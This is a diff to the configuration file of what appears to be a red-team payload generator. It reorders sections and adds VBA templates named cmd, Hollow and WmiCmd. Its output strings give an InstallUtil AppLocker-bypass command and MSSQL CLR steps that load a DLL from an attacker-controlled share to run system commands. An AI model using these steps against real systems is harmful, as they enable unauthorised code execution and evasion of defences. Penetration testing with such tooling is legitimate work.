--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -100,7 +100,7 @@ compiler_args = -r:System.Configuration.Install
 custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
 
 [windows_cs:InstallUtilPwsh]
-expected_format = RAW_BIN
+expected_format = TEXT
 output_format = .exe
 compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
 custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
@@ -110,21 +110,21 @@ expected_format = RAW_BIN
 output_format = .exe
 
 [windows_cs:MssqlCmd.dll]
-expected_format = RAW_BIN
+expected_format = TEXT
 output_format = .dll
 compiler_args = -r:System.Data
 custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_assembly FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \n"CREATE PROCEDURE [dbo].[CustSQLCmd] @cmd NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[CustSQLCmd]; \nCustSQLCmd 'whoami'  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
-
-[windows_cs:PowerSpace]
-expected_format = TEXT
-output_format = .exe
-compiler_args = -r:core/templates/headers/System.Management.Automation.dll
 
 [windows_cs:MssqlRunner.dll]
 expected_format = RAW_BIN
 output_format = .dll
 compiler_args = -r:System.Data
 custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_run FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \nCREATE PROCEDURE [dbo].[CustSQLRunner] AS EXTERNAL NAME [my_run].[StoredProcedures].[CustSQLRunner]; \nCustSQLRunner  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
+
+[windows_cs:PowerSpace]
+expected_format = TEXT
+output_format = .exe
+compiler_args = -r:core/templates/headers/System.Management.Automation.dll
 
 [windows_cs:MockingJay]
 expected_format = RAW_BIN
@@ -166,6 +166,18 @@ output_format = .vba
 
 [windows_vba:Runner]
 expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:cmd]
+expected_format = TEXT
+output_format = .vba
+
+[windows_vba:Hollow]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:WmiCmd]
+expected_format = TEXT
 output_format = .vba
 
 [windows_aspx:NtMapViewOfSection]
